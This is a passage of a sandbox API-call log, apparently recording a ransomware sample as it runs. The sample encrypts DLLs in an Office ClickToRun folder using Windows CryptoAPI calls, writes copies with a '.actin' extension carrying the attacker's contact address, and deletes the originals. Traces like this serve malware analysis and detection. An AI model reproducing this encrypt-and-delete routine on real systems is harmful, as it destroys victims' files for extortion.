dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac3170) returned 1 [0141.969] CryptSetKeyParam (hKey=0xac3170, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0141.969] ReadFile (in: hFile=0x2f8, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x4ac0, lpOverlapped=0x0) returned 1 [0141.975] CryptEncrypt (in: hKey=0xac3170, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x4ad0, dwBufLen=0x4ad0 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x4ad0) returned 1 [0141.975] WriteFile (in: hFile=0x2f4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x4ad0, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x4ad0, lpOverlapped=0x0) returned 1 [0141.976] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2e30) returned 1 [0141.976] CryptSetKeyParam (hKey=0xac2e30, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0141.977] CryptEncrypt (in: hKey=0xac2e30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x70, dwBufLen=0x70 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x70) returned 1 [0141.977] CryptDestroyKey (hKey=0xac2e30) returned 1 [0141.977] WriteFile (in: hFile=0x2f4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x122, lpOverlapped=0x0) returned 1 [0141.977] CryptDestroyKey (hKey=0xac3170) returned 1 [0141.977] CloseHandle (hObject=0x2f8) returned 1 [0141.977] CloseHandle (hObject=0x2f4) returned 1 [0141.978] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll")) returned 1 [0141.979] SetEvent (hEvent=0x288) returned 1 [0141.979] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0141.979] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-xstate-l2-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0141.981] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=11616) returned 1 [0141.981] CloseHandle (hObject=0x2f8) returned 1 [0141.981] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-xstate-l2-1-0.dll")) returned 0x20 [0141.981] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-xstate-l2-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0141.981] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-xstate-l2-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0141.981] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0141.981] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0141.981] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-xstate-l2-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0141.983] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac3330) returned 1 [0141.983] CryptSetKeyParam (hKey=0xac3330, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0141.983] ReadFile (in: hFile=0x2f8, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x2d60, lpOverlapped=0x0) returned 1 [0141.991] CryptEncrypt (in: hKey=0xac3330, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x2d70, dwBufLen=0x2d70 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x2d70) returned 1 [0141.992] WriteFile (in: hFile=0x2f0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x2d70, lpOverlapped=0x0) returned 1 [0141.993] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac3030) returned 1 [0141.993] CryptSetKeyParam (hKey=0xac3030, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0141.993] CryptEncrypt (in: hKey=0xac3030, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x70, dwBufLen=0x70 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x70) returned 1 [0141.993] CryptDestroyKey (hKey=0xac3030) returned 1 [0141.993] WriteFile (in: hFile=0x2f0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x122, lpOverlapped=0x0) returned 1 [0141.993] CryptDestroyKey (hKey=0xac3330) returned 1 [0141.993] CloseHandle (hObject=0x2f8) returned 1 [0141.993] CloseHandle (hObject=0x2f0) returned 1 [0141.995] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-xstate-l2-1-0.dll")) returned 1 [0141.996] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0141.996] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0141.996] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=22720) returned 1 [0141.996] CloseHandle (hObject=0x2f0) returned 1 [0141.996] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll")) returned 0x20 [0141.996] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0141.996] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0141.996] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0141.996] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0141.996] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0141.997] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac3030) returned 1 [0141.997] CryptSetKeyParam (hKey=0xac3030, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0141.997] ReadFile (in: hFile=0x2f0, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x58c0, lpOverlapped=0x0) returned 1 [0142.075] CryptEncrypt (in: hKey=0xac3030, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x58d0, dwBufLen=0x58d0 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x58d0) returned 1 [0142.075] WriteFile (in: hFile=0x2f8, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x58d0, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x58d0, lpOverlapped=0x0) returned 1 [0142.077] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac3170) returned 1 [0142.077] CryptSetKeyParam (hKey=0xac3170, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0142.077] CryptEncrypt (in: hKey=0xac3170, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x70, dwBufLen=0x70 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x70) returned 1 [0142.077] CryptDestroyKey (hKey=0xac3170) returned 1 [0142.077] WriteFile (in: hFile=0x2f8, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x122, lpOverlapped=0x0) returned 1 [0142.077] CryptDestroyKey (hKey=0xac3030) returned 1 [0142.077] CloseHandle (hObject=0x2f0) returned 1 [0142.077] CloseHandle (hObject=0x2f8) returned 1 [0142.078] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll")) returned 1 [0142.372] SetEvent (hEvent=0x288) returned 1 [0142.372] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0142.372] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-private-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0142.373] GetFileSizeEx (in: hFile=0x2d8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=70848) returned 1 [0142.373] CloseHandle (hObject=0x2d8) returned 1 [0142.373] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-private-l1-1-0.dll")) returned 0x20 [0142.373] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-private-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0142.373] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-private-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0142.373] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0142.373] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0142.373] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-private-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0142.373] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac2e30) returned 1 [0142.373] CryptSetKeyParam (hKey=0xac2e30, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0142.373] ReadFile (in: hFile=0x2d8, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x114c0, lpOverlapped=0x0) returned 1 [0142.376] CryptEncrypt (in: hKey=0xac2e30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x114d0, dwBufLen=0x114d0 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x114d0) returned 1 [0142.376] WriteFile (in: hFile=0x2fc, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x114d0, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x114d0, lpOverlapped=0x0) returned 1 [0142.378] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac3130) returned 1 [0142.378] CryptSetKeyParam (hKey=0xac3130, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0142.378] CryptEncrypt (in: hKey=0xac3130, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x70, dwBufLen=0x70 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x70) returned 1 [0142.378] CryptDestroyKey (hKey=0xac3130) returned 1 [0142.379] WriteFile (in: hFile=0x2fc, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x122, lpOverlapped=0x0) returned 1 [0142.379] CryptDestroyKey (hKey=0xac2e30) returned 1 [0142.379] CloseHandle (hObject=0x2d8) returned 1 [0142.379] CloseHandle (hObject=0x2fc) returned 1 [0142.381] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-private-l1-1-0.dll")) returned 1 [0142.382] SetEvent (hEvent=0x288) returned 1 [0142.382] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0142.382] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-process-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0142.382] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=19648) returned 1 [0142.382] CloseHandle (hObject=0x2fc) returned 1 [0142.382] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-process-l1-1-0.dll")) returned 0x20 [0142.382] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-process-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0142.383] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-process-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0142.383] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0142.383] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0142.383] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-process-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0142.383] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac2f70) returned 1 [0142.383] CryptSetKeyParam (hKey=0xac2f70, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0142.383] ReadFile (in: hFile=0x2fc, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x4cc0, lpOverlapped=0x0) returned 1 [0142.385] CryptEncrypt (in: hKey=0xac2f70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x4cd0, dwBufLen=0x4cd0 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x4cd0) returned 1 [0142.385] WriteFile (in: hFile=0x2d8, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x4cd0, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x4cd0, lpOverlapped=0x0) returned 1 [0142.386] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2e30) returned 1 [0142.386] CryptSetKeyParam (hKey=0xac2e30, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0142.386] CryptEncrypt (in: hKey=0xac2e30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x70, dwBufLen=0x70 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x70) returned 1 [0142.386] CryptDestroyKey (hKey=0xac2e30) returned 1 [0142.386] WriteFile (in: hFile=0x2d8, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x122, lpOverlapped=0x0) returned 1 [0142.386] CryptDestroyKey (hKey=0xac2f70) returned 1 [0142.386] CloseHandle (hObject=0x2fc) returned 1 [0142.387] CloseHandle (hObject=0x2d8) returned 1 [0142.387] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-process-l1-1-0.dll")) returned 1 [0142.388] SetEvent (hEvent=0x288) returned 1 [0142.389] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0142.389] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-runtime-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0142.389] GetFileSizeEx (in: hFile=0x2d8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=23232) returned 1 [0142.389] CloseHandle (hObject=0x2d8) returned 1 [0142.389] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-runtime-l1-1-0.dll")) returned 0x20 [0142.390] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-runtime-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0142.390] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-runtime-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0142.390] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0142.390] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0142.390] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-runtime-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0142.390] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac2d70) returned 1 [0142.390] CryptSetKeyParam (hKey=0xac2d70, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0142.390] ReadFile (in: hFile=0x2d8, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x5ac0, lpOverlapped=0x0) returned 1 [0142.392] CryptEncrypt (in: hKey=0xac2d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x5ad0, dwBufLen=0x5ad0 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x5ad0) returned 1 [0142.392] WriteFile (in: hFile=0x2fc, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x5ad0, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x5ad0, lpOverlapped=0x0) returned 1 [0142.393] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac33b0) returned 1 [0142.394] CryptSetKeyParam (hKey=0xac33b0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0142.394] CryptEncrypt (in: hKey=0xac33b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x70, dwBufLen=0x70 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x70) returned 1 [0142.394] 